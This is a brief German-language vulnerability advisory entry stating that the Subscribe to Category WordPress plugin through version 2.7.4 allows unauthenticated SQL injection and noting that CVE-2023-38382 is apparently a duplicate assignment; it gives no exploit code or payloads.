Beschreibung

Das Subscribe to Category Plugin für WordPress ist anfällig für SQL-Injection in Versionen bis einschließlich 2.7.4 aufgrund unzureichender Maskierung des benutzerbereitgestellten Parameters und fehlender ausreichender Vorbereitung der bestehenden SQL-Abfrage. Dies ermöglicht es nicht authentifizierten Angreifern, zusätzliche SQL-Abfragen in bereits bestehende Abfragen einzufügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können. CVE-2023-38382 scheint eine doppelte Zuweisung dieses Problems zu sein.
